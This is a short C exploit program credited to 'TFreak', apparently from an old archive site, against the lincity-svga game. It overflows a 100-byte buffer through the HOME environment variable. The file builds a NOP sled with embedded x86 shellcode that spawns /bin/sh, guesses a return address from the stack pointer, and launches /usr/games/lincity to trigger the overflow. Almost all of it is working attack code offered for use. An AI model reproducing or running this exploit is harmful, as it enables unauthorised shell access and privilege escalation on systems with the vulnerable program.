home *** CD-ROM | disk | FTP | other *** search
- /*
- * lincity-svga exploit by TFreak
- *
- * another example of bad programming, copying theHOME
- * environment without bounds checking to a static size buffer
- * (100 bytes)
- *
- */
-
- #include <stdio.h>
-
- #define bs 250
- #define of 300
-
- unsigned long sp (void);
-
- int main(int argc, char *argv[])
- {
- char *p, *buf;
- char shell[] =
- "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
- "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
- "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
- unsigned long addr, *paddr;
- int i;
-
- buf = (char *) malloc(bs);
- p = buf;
- paddr = (unsigned long *) p;
-
- addr = sp() - of;
-
- for (i = 0; i < bs; i += 4)
- *(paddr++) = addr;
-
- memset(p, 0x90, bs/2);
- p += bs/2;
-
- for (i = 0; i < strlen(shell); i++)
- *(p++) = shell[i];
-
- setenv("HOME", buf, 1);
- execl("/usr/games/lincity", "lincity", NULL);
- }
-
- unsigned long sp (void)
- {
- __asm__("movl %esp, %eax");
- }
-